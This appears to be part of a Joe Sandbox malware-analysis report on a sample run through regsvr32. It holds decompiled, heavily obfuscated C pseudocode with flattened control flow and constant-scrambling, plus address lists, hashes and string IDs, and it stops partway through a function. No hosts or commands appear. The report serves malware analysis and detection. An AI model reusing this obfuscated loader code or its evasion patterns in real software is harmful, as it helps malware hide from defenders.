                                                                                                                				_v20 = _v20 << 0xc;
                                                                                                                				_v20 = _v20 ^ 0xedc444a7;
                                                                                                                				_v104 = 0x5e098c;
                                                                                                                				_v104 = _v104 ^ 0x23bb05e9;
                                                                                                                				_v104 = _v104 + 0xc8e0;
                                                                                                                				_v104 = _v104 ^ 0x23ed8dfd;
                                                                                                                				_v144 = 0xc26c3a;
                                                                                                                				_v144 = _v144 + 0x6b8b;
                                                                                                                				_v144 = _v144 >> 7;
                                                                                                                				_v144 = _v144 ^ 0x000b484d;
                                                                                                                				_v120 = 0x7acab0;
                                                                                                                				_v120 = _v120 + 0xfffffc67;
                                                                                                                				_v120 = _v120 + 0xffffbb66;
                                                                                                                				_v120 = _v120 ^ 0x00798dc4;
                                                                                                                				_v76 = 0xe0c3fb;
                                                                                                                				_v76 = _v76 ^ 0x6133999e;
                                                                                                                				_v76 = _v76 ^ 0x61d59a93;
                                                                                                                				_v152 = 0x94314c;
                                                                                                                				_v152 = _v152 << 5;
                                                                                                                				_v152 = _v152 << 8;
                                                                                                                				_v152 = _v152 ^ 0x862dabc2;
                                                                                                                				_v84 = 0xcdabf9;
                                                                                                                				_v84 = _v84 + 0x544f;
                                                                                                                				_v84 = _v84 ^ 0x00c6a3a9;
                                                                                                                				_v180 = 0x5f41b2;
                                                                                                                				_v180 = _v180 + 0xffff4682;
                                                                                                                				_v180 = _v180 >> 1;
                                                                                                                				_v180 = _v180 ^ 0x0022081f;
                                                                                                                				_v236 = 0xf2aa39;
                                                                                                                				_v236 = _v236 >> 9;
                                                                                                                				_v236 = _v236 >> 8;
                                                                                                                				_v236 = _v236 + 0x9b45;
                                                                                                                				_v236 = _v236 ^ 0x0009958d;
                                                                                                                				_v68 = 0xdde008;
                                                                                                                				_v68 = _v68 + 0x4af0;
                                                                                                                				_v68 = _v68 ^ 0x00d6a8c4;
                                                                                                                				_v136 = 0x497b9a;
                                                                                                                				_v136 = _v136 + 0xe5a5;
                                                                                                                				_v136 = _v136 ^ 0x731a7a92;
                                                                                                                				_v136 = _v136 ^ 0x735d569e;
                                                                                                                				_v156 = 0x97046a;
                                                                                                                				_v156 = _v156 >> 8;
                                                                                                                				_v156 = _v156 << 0x10;
                                                                                                                				_v156 = _v156 ^ 0x970abbc9;
                                                                                                                				_v164 = 0x6a8d40;
                                                                                                                				_v164 = _v164 | 0xe58a5675;
                                                                                                                				_v164 = _v164 + 0xa73e;
                                                                                                                				_v164 = _v164 ^ 0xe5e6b069;
                                                                                                                				_v296 = 0xbca62e;
                                                                                                                				_t946 = 0x69;
                                                                                                                				_v296 = _v296 / _t946;
                                                                                                                				_v296 = _v296 + 0xffff8af2;
                                                                                                                				_v296 = _v296 + 0x76c0;
                                                                                                                				_v296 = _v296 ^ 0x000403e0;
                                                                                                                				_v60 = 0x71959b;
                                                                                                                				_v60 = _v60 + 0xffff61df;
                                                                                                                				_v60 = _v60 ^ 0x0072eb06;
                                                                                                                				_v288 = 0xa400a;
                                                                                                                				_v288 = _v288 + 0x5ee4;
                                                                                                                				_t947 = 0x63;
                                                                                                                				_v288 = _v288 * 0x5b;
                                                                                                                				_v288 = _v288 * 0x1c;
                                                                                                                				_v288 = _v288 ^ 0x69b5db4e;
                                                                                                                				_v224 = 0x1c7aae;
                                                                                                                				_v224 = _v224 / _t947;
                                                                                                                				_v224 = _v224 << 4;
                                                                                                                				_v224 = _v224 ^ 0x000bc0e5;
                                                                                                                				_v148 = 0x1d8b31;
                                                                                                                				_v148 = _v148 + 0xb9c7;
                                                                                                                				_v148 = _v148 + 0xffa0;
                                                                                                                				_v148 = _v148 ^ 0x001aef97;
                                                                                                                				_v212 = 0x9272ad;
                                                                                                                				_v212 = _v212 ^ 0x0fff2c78;
                                                                                                                				_v212 = _v212 + 0xfffffd06;
                                                                                                                				_v212 = _v212 ^ 0x0f626838;
                                                                                                                				_v264 = 0x9fef13;
                                                                                                                				_v264 = _v264 + 0x6337;
                                                                                                                				_v264 = _v264 ^ 0xb03854b3;
                                                                                                                				_v264 = _v264 + 0xfb60;
                                                                                                                				_v264 = _v264 ^ 0xb0902fd2;
                                                                                                                				_v304 = 0x4402ab;
                                                                                                                				_v304 = _v304 | 0x9b5a85b4;
                                                                                                                				_v304 = _v304 ^ 0x9b50ed56;
                                                                                                                				_v220 = 0xbdc1e3;
                                                                                                                				_v220 = _v220 + 0x69fa;
                                                                                                                				_v220 = _v220 + 0xffffa833;
                                                                                                                				_v220 = _v220 ^ 0x00b5effa;
                                                                                                                				_v216 = 0xbb9afc;
                                                                                                                				_v216 = _v216 << 0xd;
                                                                                                                				_v216 = _v216 + 0xffff2452;
                                                                                                                				_v216 = _v216 ^ 0x735287b4;
                                                                                                                				_v36 = 0xf6688e;
                                                                                                                				_v36 = _v36 + 0x3147;
                                                                                                                				_v36 = _v36 ^ 0x00fb923e;
                                                                                                                				_v240 = 0x92aad5;
                                                                                                                				_v240 = _v240 | 0x5d0ac114;
                                                                                                                				_t948 = 0x11;
                                                                                                                				_v240 = _v240 / _t948;
                                                                                                                				_v240 = _v240 + 0x5668;
                                                                                                                				_v240 = _v240 ^ 0x058ec842;
                                                                                                                				_v140 = 0x640ca6;
                                                                                                                				_t949 = 0x30;
                                                                                                                				_v140 = _v140 / _t949;
                                                                                                                				_v140 = _v140 ^ 0x0009b4cd;
                                                                                                                				_v176 = 0x82570b;
                                                                                                                				_v176 = _v176 ^ 0x3d9bdb33;
                                                                                                                				_v176 = _v176 >> 0x10;
                                                                                                                				_v176 = _v176 ^ 0x000787a1;
                                                                                                                				_v88 = 0xb5811f;
                                                                                                                				_v88 = _v88 + 0x812;
                                                                                                                				_v88 = _v88 ^ 0x00bfa4e1;
                                                                                                                				_v188 = 0xc91f5d;
                                                                                                                				_v188 = _v188 + 0xffffad5f;
                                                                                                                				_v188 = _v188 | 0x341e0112;
                                                                                                                				_v188 = _v188 ^ 0x34d38f15;
                                                                                                                				_v96 = 0x56e619;
                                                                                                                				_v96 = _v96 << 0xd;
                                                                                                                				_t950 = 0x3a;
                                                                                                                				_v96 = _v96 * 0x63;
                                                                                                                				_v96 = _v96 ^ 0x5f72b52e;
                                                                                                                				_v232 = 0x364d1f;
                                                                                                                				_v232 = _v232 / _t950;
                                                                                                                				_v232 = _v232 + 0xa098;
                                                                                                                				_v232 = _v232 * 0x2c;
                                                                                                                				_v232 = _v232 ^ 0x0049fe2e;
                                                                                                                				_v28 = 0xcc3131;
                                                                                                                				_v28 = _v28 * 0x32;
                                                                                                                				_v28 = _v28 ^ 0x27eb4cba;
                                                                                                                				_v116 = 0x1ebb5f;
                                                                                                                				_v116 = _v116 * 0x54;
                                                                                                                				_v116 = _v116 >> 7;
                                                                                                                				_v116 = _v116 ^ 0x001ef78d;
                                                                                                                				_v248 = 0xf6b113;
                                                                                                                				_v248 = _v248 + 0xffff3165;
                                                                                                                				_v248 = _v248 | 0xb1f93646;
                                                                                                                				_v248 = _v248 * 0x75;
                                                                                                                				_v248 = _v248 ^ 0x591acb6a;
                                                                                                                				_v308 = 0x659b68;
                                                                                                                				_v308 = _v308 + 0xffff71a4;
                                                                                                                				_v308 = _v308 >> 6;
                                                                                                                				_v308 = _v308 ^ 0x000ffbdc;
                                                                                                                				_v196 = 0x7b04db;
                                                                                                                				_v196 = _v196 | 0x799bd387;
                                                                                                                				_v196 = _v196 + 0xffffd957;
                                                                                                                				_v196 = _v196 ^ 0x79fedbe2;
                                                                                                                				_v312 = 0x80d0ce;
                                                                                                                				_v312 = _v312 * 0xc;
                                                                                                                				_v312 = _v312 + 0x1bef;
                                                                                                                				_v312 = _v312 | 0xde8eb791;
                                                                                                                				_v312 = _v312 ^ 0xde8c5a5f;
                                                                                                                				_v204 = 0x7e9e41;
                                                                                                                				_v204 = _v204 ^ 0x78eb08e1;
                                                                                                                				_v204 = _v204 >> 0xc;
                                                                                                                				_v204 = _v204 ^ 0x000052ca;
                                                                                                                				_t951 = _v12;
                                                                                                                				_t960 = _v12;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t920 = 0xc1aa0ea;
                                                                                                                					while(1) {
                                                                                                                						_t830 = _v256;
                                                                                                                						while(1) {
                                                                                                                							L3:
                                                                                                                							_t966 = _t952 - 0xa785311;
                                                                                                                							if(_t966 > 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							if(_t966 == 0) {
                                                                                                                								E001BECE4(_v232, _v28, _t830, _v116, _v248);
                                                                                                                								_t952 = 0x9465765;
                                                                                                                								goto L12;
                                                                                                                							} else {
                                                                                                                								if(_t952 == 0x265809f) {
                                                                                                                									_t960 = E001B3D5B(_v268, _v72, _v208, _t861, _t861, _v40, _t861, _v80, _t861, _v132);
                                                                                                                									__eflags = _t960;
                                                                                                                									_t952 =  !=  ? 0xf83b3d3 : 0xf5b5752;
                                                                                                                									E001B17D2(_v200, _v124, 0);
                                                                                                                									_t962 =  &(_t962[9]);
                                                                                                                									L39:
                                                                                                                									_t861 = _a8;
                                                                                                                									_t920 = 0xc1aa0ea;
                                                                                                                									goto L40;
                                                                                                                								} else {
                                                                                                                									if(_t952 == 0x6707bf9) {
                                                                                                                										_t880 =  *_t861;
                                                                                                                										__eflags = _t880;
                                                                                                                										if(_t880 == 0) {
                                                                                                                											_t853 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                										} else {
                                                                                                                											_t853 = _a8[1];
                                                                                                                										}
                                                                                                                										E001A3129(_t880, _t951, _t880, _t853, _v216, _v4, _v36, _v240, _v140);
                                                                                                                										_t962 =  &(_t962[7]);
                                                                                                                										asm("sbb esi, esi");
                                                                                                                										_t952 = (_t952 & 0x07b41948) + 0x71f4b16;
                                                                                                                										goto L13;
                                                                                                                									} else {
                                                                                                                										if(_t952 == 0x71f4b16) {
                                                                                                                											E001BECE4(_v176, _v88, _t951, _v188, _v96);
                                                                                                                											_t952 = 0xa785311;
                                                                                                                											L12:
                                                                                                                											_t962 =  &(_t962[3]);
                                                                                                                											L13:
                                                                                                                											_t861 = _a8;
                                                                                                                											goto L1;
                                                                                                                										} else {
                                                                                                                											if(_t952 == 0x9465765) {
                                                                                                                												E001BECE4(_v308, _v196, _t960, _v312, _v204);
                                                                                                                											} else {
                                                                                                                												if(_t952 != 0x9cb49f1) {
                                                                                                                													L40:
                                                                                                                													__eflags = _t952 - 0xf5b5752;
                                                                                                                													if(_t952 != 0xf5b5752) {
                                                                                                                														_t830 = _v256;
                                                                                                                														continue;
                                                                                                                													}
                                                                                                                												} else {
                                                                                                                													_t952 = 0xfe0e961;
                                                                                                                													continue;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L43:
                                                                                                                							return _t859;
                                                                                                                						}
                                                                                                                						__eflags = _t952 - _t920;
                                                                                                                						if(_t952 == _t920) {
                                                                                                                							__eflags =  *_t861;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t831 = _v16;
                                                                                                                							} else {
                                                                                                                								_push(_v20);
                                                                                                                								_push(0x1a1668);
                                                                                                                								_push(_v100);
                                                                                                                								_t831 = E001BF5D9(_v112, _v92, __eflags);
                                                                                                                								_t962 =  &(_t962[3]);
                                                                                                                								_v16 = _t831;
                                                                                                                							}
                                                                                                                							_t870 = _v168 | _v128 | _v160 | _v276 | _v228 | _v48 | _v252 | _v24 | _v300;
                                                                                                                							_t954 = _a36 & 1;
                                                                                                                							__eflags = _t954;
                                                                                                                							if(_t954 != 0) {
                                                                                                                								__eflags = _t870;
                                                                                                                							}
                                                                                                                							_t951 = E001ACAFE(_t831, _v104, _t870, _v144, _v120, _t870, _t870, _a28, _t870, _v256, _v76, _t870, _v152, _v84);
                                                                                                                							E001BF94B(_v16, _v180, _v236, _v68, _v136);
                                                                                                                							_t962 =  &(_t962[0xf]);
                                                                                                                							__eflags = _t951;
                                                                                                                							if(_t951 == 0) {
                                                                                                                								_t952 = 0xa785311;
                                                                                                                								goto L39;
                                                                                                                							} else {
                                                                                                                								_v52 = 1;
                                                                                                                								E001B6561(_v156, _v164, _v296, _t951, _v172, 4,  &_v52, _v60);
                                                                                                                								_t962 =  &(_t962[6]);
                                                                                                                								__eflags = _t954;
                                                                                                                								if(_t954 != 0) {
                                                                                                                									E001B038B( &_v52, _v280, _v288, _v224,  &_v12, _t951, _v148);
                                                                                                                									_t764 =  &_v52;
                                                                                                                									 *_t764 = _v52 | _v272;
                                                                                                                									__eflags =  *_t764;
                                                                                                                									E001B6561(_v212, _v264, _v304, _t951, _v44, _v12,  &_v52, _v220);
                                                                                                                									_t962 =  &(_t962[0xb]);
                                                                                                                								}
                                                                                                                								_t952 = 0x6707bf9;
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							__eflags = _t952 - 0xd4d6607;
                                                                                                                							if(_t952 == 0xd4d6607) {
                                                                                                                								__eflags = E001B35A3(_t951, _a4);
                                                                                                                								_t952 = 0x71f4b16;
                                                                                                                								_t845 = 1;
                                                                                                                								_t859 =  !=  ? _t845 : _t859;
                                                                                                                								goto L13;
                                                                                                                							} else {
                                                                                                                								__eflags = _t952 - 0xed3645e;
                                                                                                                								if(_t952 == 0xed3645e) {
                                                                                                                									__eflags = E001A6D15(_t951, _v184) - _v56;
                                                                                                                									_t952 =  ==  ? 0xd4d6607 : 0x71f4b16;
                                                                                                                									goto L13;
                                                                                                                								} else {
                                                                                                                									__eflags = _t952 - 0xf83b3d3;
                                                                                                                									if(_t952 == 0xf83b3d3) {
                                                                                                                										_push(_v292);
                                                                                                                										_push(_v192);
                                                                                                                										_push(_t960);
                                                                                                                										_push(_v108);
                                                                                                                										_push(_v64);
                                                                                                                										_push(_v260);
                                                                                                                										_push(_a20);
                                                                                                                										_push(_v284);
                                                                                                                										_push(_v8);
                                                                                                                										_t830 = E001A8D7E(_v244, _v32);
                                                                                                                										_t861 = _a8;
                                                                                                                										_t962 = _t962 - 0x10 + 0x34;
                                                                                                                										__eflags = _t830;
                                                                                                                										_v256 = _t830;
                                                                                                                										_t920 = 0xc1aa0ea;
                                                                                                                										_t952 =  !=  ? 0xc1aa0ea : 0x9465765;
                                                                                                                										goto L3;
                                                                                                                									} else {
                                                                                                                										__eflags = _t952 - 0xfe0e961;
                                                                                                                										if(_t952 != 0xfe0e961) {
                                                                                                                											goto L40;
                                                                                                                										} else {
                                                                                                                											_t952 = 0x265809f;
                                                                                                                											goto L3;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L43;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}

                                                                                                                0x001bc074
                                                                                                                0x001bc07c
                                                                                                                0x001bc084
                                                                                                                0x001bc089
                                                                                                                0x001bc091
                                                                                                                0x001bc099
                                                                                                                0x001bc0a1
                                                                                                                0x001bc0a9
                                                                                                                0x001bc0b1
                                                                                                                0x001bc0b9
                                                                                                                0x001bc0c1
                                                                                                                0x001bc0c6
                                                                                                                0x001bc0ce
                                                                                                                0x001bc0d6
                                                                                                                0x001bc0de
                                                                                                                0x001bc0e6
                                                                                                                0x001bc0ee
                                                                                                                0x001bc0f6
                                                                                                                0x001bc0fb
                                                                                                                0x001bc103
                                                                                                                0x001bc10b
                                                                                                                0x001bc113
                                                                                                                0x001bc11b
                                                                                                                0x001bc123
                                                                                                                0x001bc131
                                                                                                                0x001bc13a
                                                                                                                0x001bc13e
                                                                                                                0x001bc146
                                                                                                                0x001bc14e
                                                                                                                0x001bc156
                                                                                                                0x001bc15e
                                                                                                                0x001bc166
                                                                                                                0x001bc16e
                                                                                                                0x001bc173
                                                                                                                0x001bc17a
                                                                                                                0x001bc182
                                                                                                                0x001bc18a
                                                                                                                0x001bc192
                                                                                                                0x001bc19a
                                                                                                                0x001bc19f
                                                                                                                0x001bc1a7
                                                                                                                0x001bc1af
                                                                                                                0x001bc1b7
                                                                                                                0x001bc1bf
                                                                                                                0x001bc1c7
                                                                                                                0x001bc1cf
                                                                                                                0x001bc1d7
                                                                                                                0x001bc1df
                                                                                                                0x001bc1e4
                                                                                                                0x001bc1ec
                                                                                                                0x001bc1f4
                                                                                                                0x001bc1fc
                                                                                                                0x001bc204
                                                                                                                0x001bc212
                                                                                                                0x001bc217
                                                                                                                0x001bc21d
                                                                                                                0x001bc222
                                                                                                                0x001bc227
                                                                                                                0x001bc22f
                                                                                                                0x001bc237
                                                                                                                0x001bc23c
                                                                                                                0x001bc244
                                                                                                                0x001bc24c
                                                                                                                0x001bc259
                                                                                                                0x001bc25a
                                                                                                                0x001bc25e
                                                                                                                0x001bc266
                                                                                                                0x001bc26e
                                                                                                                0x001bc276
                                                                                                                0x001bc27e
                                                                                                                0x001bc286
                                                                                                                0x001bc28e
                                                                                                                0x001bc299
                                                                                                                0x001bc2a4
                                                                                                                0x001bc2af
                                                                                                                0x001bc2ba
                                                                                                                0x001bc2c5
                                                                                                                0x001bc2d0
                                                                                                                0x001bc2e4
                                                                                                                0x001bc2eb
                                                                                                                0x001bc2f6
                                                                                                                0x001bc301
                                                                                                                0x001bc30c
                                                                                                                0x001bc31f
                                                                                                                0x001bc326
                                                                                                                0x001bc331
                                                                                                                0x001bc33c
                                                                                                                0x001bc344
                                                                                                                0x001bc34c
                                                                                                                0x001bc357
                                                                                                                0x001bc35f
                                                                                                                0x001bc36c
                                                                                                                0x001bc370
                                                                                                                0x001bc378
                                                                                                                0x001bc380
                                                                                                                0x001bc38b
                                                                                                                0x001bc393
                                                                                                                0x001bc39e
                                                                                                                0x001bc3a6
                                                                                                                0x001bc3ab
                                                                                                                0x001bc3af
                                                                                                                0x001bc3b7
                                                                                                                0x001bc3bf
                                                                                                                0x001bc3c7
                                                                                                                0x001bc3d1
                                                                                                                0x001bc3d6
                                                                                                                0x001bc3e5
                                                                                                                0x001bc3e6
                                                                                                                0x001bc3ea
                                                                                                                0x001bc3f2
                                                                                                                0x001bc3fd
                                                                                                                0x001bc408
                                                                                                                0x001bc413
                                                                                                                0x001bc41e
                                                                                                                0x001bc429
                                                                                                                0x001bc431
                                                                                                                0x001bc43c
                                                                                                                0x001bc447
                                                                                                                0x001bc44f
                                                                                                                0x001bc45a
                                                                                                                0x001bc465
                                                                                                                0x001bc478
                                                                                                                0x001bc47f
                                                                                                                0x001bc487
                                                                                                                0x001bc492
                                                                                                                0x001bc49d
                                                                                                                0x001bc4b1
                                                                                                                0x001bc4b8
                                                                                                                0x001bc4c3
                                                                                                                0x001bc4ce
                                                                                                                0x001bc4d6
                                                                                                                0x001bc4e1
                                                                                                                0x001bc4ec
                                                                                                                0x001bc4f7
                                                                                                                0x001bc4ff
                                                                                                                0x001bc50a
                                                                                                                0x001bc515
                                                                                                                0x001bc520
                                                                                                                0x001bc52b
                                                                                                                0x001bc536
                                                                                                                0x001bc541
                                                                                                                0x001bc54c
                                                                                                                0x001bc554
                                                                                                                0x001bc55f
                                                                                                                0x001bc56a
                                                                                                                0x001bc575
                                                                                                                0x001bc580
                                                                                                                0x001bc58b
                                                                                                                0x001bc596
                                                                                                                0x001bc5a1
                                                                                                                0x001bc5ac
                                                                                                                0x001bc5b7
                                                                                                                0x001bc5bf
                                                                                                                0x001bc5c7
                                                                                                                0x001bc5d2
                                                                                                                0x001bc5dd
                                                                                                                0x001bc5e8
                                                                                                                0x001bc5f3
                                                                                                                0x001bc5fe
                                                                                                                0x001bc609
                                                                                                                0x001bc610
                                                                                                                0x001bc61b
                                                                                                                0x001bc623
                                                                                                                0x001bc628
                                                                                                                0x001bc62d
                                                                                                                0x001bc635
                                                                                                                0x001bc63d
                                                                                                                0x001bc648
                                                                                                                0x001bc653
                                                                                                                0x001bc65e
                                                                                                                0x001bc669
                                                                                                                0x001bc674
                                                                                                                0x001bc67f
                                                                                                                0x001bc68a
                                                                                                                0x001bc695
                                                                                                                0x001bc69d
                                                                                                                0x001bc6a5
                                                                                                                0x001bc6b0
                                                                                                                0x001bc6bb
                                                                                                                0x001bc6c8
                                                                                                                0x001bc6d3
                                                                                                                0x001bc6de
                                                                                                                0x001bc6ec
                                                                                                                0x001bc6f1
                                                                                                                0x001bc6f7
                                                                                                                0x001bc6ff
                                                                                                                0x001bc707
                                                                                                                0x001bc70f
                                                                                                                0x001bc71a
                                                                                                                0x001bc725
                                                                                                                0x001bc730
                                                                                                                0x001bc738
                                                                                                                0x001bc745
                                                                                                                0x001bc748
                                                                                                                0x001bc751
                                                                                                                0x001bc755
                                                                                                                0x001bc75d
                                                                                                                0x001bc76d
                                                                                                                0x001bc771
                                                                                                                0x001bc776
                                                                                                                0x001bc77e
                                                                                                                0x001bc789
                                                                                                                0x001bc794
                                                                                                                0x001bc79f
                                                                                                                0x001bc7aa
                                                                                                                0x001bc7b2
                                                                                                                0x001bc7ba
                                                                                                                0x001bc7c2
                                                                                                                0x001bc7ca
                                                                                                                0x001bc7d2
                                                                                                                0x001bc7da
                                                                                                                0x001bc7e2
                                                                                                                0x001bc7ea
                                                                                                                0x001bc7f2
                                                                                                                0x001bc7fa
                                                                                                                0x001bc802
                                                                                                                0x001bc80a
                                                                                                                0x001bc812
                                                                                                                0x001bc81a
                                                                                                                0x001bc822
                                                                                                                0x001bc82a
                                                                                                                0x001bc832
                                                                                                                0x001bc837
                                                                                                                0x001bc83f
                                                                                                                0x001bc847
                                                                                                                0x001bc852
                                                                                                                0x001bc85d

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: %"p$5#$7c$9yL$Ec$F|`$G1$OT$TeC$],0$eWF$eWF$eWF$f{N$hV$D$J
                                                                                                                • API String ID: 0-4285528825
                                                                                                                • Opcode ID: e364c2f247bf0848bdb98578d2b9216ecfd088b489ef8eba4e6240150ea0a25c
                                                                                                                • Instruction ID: 6efde3870433e5b7c5848572aecc73fcce7c0ac056dc842b2a9949335b3035b4
                                                                                                                • Opcode Fuzzy Hash: e364c2f247bf0848bdb98578d2b9216ecfd088b489ef8eba4e6240150ea0a25c
                                                                                                                • Instruction Fuzzy Hash: 77920FB15093818FD3B8CF65C54AA8FBBE1BBD4708F108A1DE5DA96260D7B48949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001AD4BC(void* __ecx) {
                                                                                                                				char _v524;
                                                                                                                				char _v1044;
                                                                                                                				char _v1564;
                                                                                                                				char _v2084;
                                                                                                                				char _v2604;
                                                                                                                				signed int _v2608;
                                                                                                                				intOrPtr _v2612;
                                                                                                                				intOrPtr _v2616;
                                                                                                                				intOrPtr _v2620;
                                                                                                                				intOrPtr _v2624;
                                                                                                                				char _v2628;
                                                                                                                				intOrPtr _v2632;
                                                                                                                				char _v2636;
                                                                                                                				signed int _v2640;
                                                                                                                				signed int _v2644;
                                                                                                                				signed int _v2648;
                                                                                                                				signed int _v2652;
                                                                                                                				signed int _v2656;
                                                                                                                				signed int _v2660;
                                                                                                                				signed int _v2664;
                                                                                                                				signed int _v2668;
                                                                                                                				signed int _v2672;
                                                                                                                				signed int _v2676;
                                                                                                                				signed int _v2680;
                                                                                                                				signed int _v2684;
                                                                                                                				signed int _v2688;
                                                                                                                				signed int _v2692;
                                                                                                                				signed int _v2696;
                                                                                                                				signed int _v2700;
                                                                                                                				signed int _v2704;
                                                                                                                				signed int _v2708;
                                                                                                                				signed int _v2712;
                                                                                                                				signed int _v2716;
                                                                                                                				signed int _v2720;
                                                                                                                				signed int _v2724;
                                                                                                                				signed int _v2728;
                                                                                                                				signed int _v2732;
                                                                                                                				signed int _v2736;
                                                                                                                				signed int _v2740;
                                                                                                                				signed int _v2744;
                                                                                                                				signed int _v2748;
                                                                                                                				signed int _v2752;
                                                                                                                				signed int _v2756;
                                                                                                                				signed int _v2760;
                                                                                                                				signed int _v2764;
                                                                                                                				signed int _v2768;
                                                                                                                				signed int _v2772;
                                                                                                                				signed int _v2776;
                                                                                                                				signed int _v2780;
                                                                                                                				signed int _v2784;
                                                                                                                				signed int _v2788;
                                                                                                                				signed int _v2792;
                                                                                                                				signed int _v2796;
                                                                                                                				signed int _v2800;
                                                                                                                				signed int _v2804;
                                                                                                                				signed int _v2808;
                                                                                                                				signed int _v2812;
                                                                                                                				signed int _v2816;
                                                                                                                				signed int _v2820;
                                                                                                                				signed int _v2824;
                                                                                                                				signed int _v2828;
                                                                                                                				signed int _v2832;
                                                                                                                				signed int _v2836;
                                                                                                                				signed int _v2840;
                                                                                                                				signed int _v2844;
                                                                                                                				signed int _v2848;
                                                                                                                				signed int _v2852;
                                                                                                                				signed int _v2856;
                                                                                                                				signed int _v2860;
                                                                                                                				signed int _v2864;
                                                                                                                				signed int _v2868;
                                                                                                                				signed int _v2872;
                                                                                                                				signed int _v2876;
                                                                                                                				signed int _v2880;
                                                                                                                				signed int _v2884;
                                                                                                                				signed int _v2888;
                                                                                                                				signed int _v2892;
                                                                                                                				signed int _v2896;
                                                                                                                				signed int _v2900;
                                                                                                                				signed int _v2904;
                                                                                                                				signed int _v2908;
                                                                                                                				signed int _v2912;
                                                                                                                				signed int _v2916;
                                                                                                                				signed int _v2920;
                                                                                                                				signed int _v2924;
                                                                                                                				signed int _v2928;
                                                                                                                				signed int _v2932;
                                                                                                                				signed int _v2936;
                                                                                                                				signed int _v2940;
                                                                                                                				void* _t749;
                                                                                                                				signed int _t750;
                                                                                                                				signed int _t756;
                                                                                                                				signed int _t782;
                                                                                                                				void* _t783;
                                                                                                                				signed int _t785;
                                                                                                                				signed int _t786;
                                                                                                                				signed int _t787;
                                                                                                                				signed int _t788;
                                                                                                                				signed int _t789;
                                                                                                                				signed int _t790;
                                                                                                                				signed int _t791;
                                                                                                                				signed int _t792;
                                                                                                                				signed int _t793;
                                                                                                                				signed int _t794;
                                                                                                                				signed int _t862;
                                                                                                                				signed int _t864;
                                                                                                                				signed int _t866;
                                                                                                                				void* _t869;
                                                                                                                				signed int* _t870;
                                                                                                                				void* _t879;
                                                                                                                
                                                                                                                				_t870 =  &_v2940;
                                                                                                                				_v2608 = _v2608 & 0x00000000;
                                                                                                                				_v2616 = 0xcdb843;
                                                                                                                				_v2612 = 0x6224f8;
                                                                                                                				_v2884 = 0xb1b113;
                                                                                                                				_v2884 = _v2884 >> 0xf;
                                                                                                                				_v2884 = _v2884 | 0xff9fddcf;
                                                                                                                				_v2884 = _v2884 ^ 0xff9fddc6;
                                                                                                                				_v2768 = 0xad1848;
                                                                                                                				_v2768 = _v2768 ^ 0x03577078;
                                                                                                                				_v2768 = _v2768 ^ 0x9bb3462e;
                                                                                                                				_v2768 = _v2768 ^ 0x98592e1e;
                                                                                                                				_v2808 = 0x6b6a84;
                                                                                                                				_v2808 = _v2808 * 0x4d;
                                                                                                                				_t869 = __ecx;
                                                                                                                				_t864 = 0x404cf9;
                                                                                                                				_t785 = 0x42;
                                                                                                                				_v2808 = _v2808 / _t785;
                                                                                                                				_v2808 = _v2808 ^ 0x007c4bdd;
                                                                                                                				_v2752 = 0x4da79e;
                                                                                                                				_v2752 = _v2752 + 0xffffb3ec;
                                                                                                                				_t786 = 0x48;
                                                                                                                				_v2752 = _v2752 * 0x68;
                                                                                                                				_v2752 = _v2752 ^ 0x1f6c26d7;
                                                                                                                				_v2892 = 0xdae661;
                                                                                                                				_v2892 = _v2892 >> 0xa;
                                                                                                                				_v2892 = _v2892 * 0x79;
                                                                                                                				_v2892 = _v2892 + 0xffffc3ef;
                                                                                                                				_v2892 = _v2892 ^ 0x001d82ae;
                                                                                                                				_v2720 = 0x68d3c3;
                                                                                                                				_v2720 = _v2720 + 0xa703;
                                                                                                                				_v2720 = _v2720 ^ 0x006a1e3d;
                                                                                                                				_v2760 = 0x87ea6b;
                                                                                                                				_v2760 = _v2760 >> 0xa;
                                                                                                                				_v2760 = _v2760 | 0x26b3dcef;
                                                                                                                				_v2760 = _v2760 ^ 0x26b4d64a;
                                                                                                                				_v2728 = 0x2dee78;
                                                                                                                				_t59 =  &_v2728; // 0x2dee78
                                                                                                                				_v2728 =  *_t59 * 6;
                                                                                                                				_v2728 = _v2728 ^ 0x011afaa9;
                                                                                                                				_v2936 = 0x28f3f3;
                                                                                                                				_v2936 = _v2936 | 0x5daf9049;
                                                                                                                				_v2936 = _v2936 / _t786;
                                                                                                                				_v2936 = _v2936 << 0xd;
                                                                                                                				_v2936 = _v2936 ^ 0xa3805742;
                                                                                                                				_v2824 = 0xef3213;
                                                                                                                				_v2824 = _v2824 ^ 0x8f68d062;
                                                                                                                				_v2824 = _v2824 << 4;
                                                                                                                				_v2824 = _v2824 ^ 0xf877df33;
                                                                                                                				_v2820 = 0x5c08bb;
                                                                                                                				_v2820 = _v2820 | 0x452ef748;
                                                                                                                				_v2820 = _v2820 ^ 0x1b6a95c7;
                                                                                                                				_v2820 = _v2820 ^ 0x5e149f64;
                                                                                                                				_v2812 = 0xc07ff3;
                                                                                                                				_v2812 = _v2812 | 0x9a6b0e6c;
                                                                                                                				_v2812 = _v2812 ^ 0x1ccd0fc8;
                                                                                                                				_v2812 = _v2812 ^ 0x862bcffb;
                                                                                                                				_v2780 = 0xe753fa;
                                                                                                                				_v2780 = _v2780 ^ 0x5666a272;
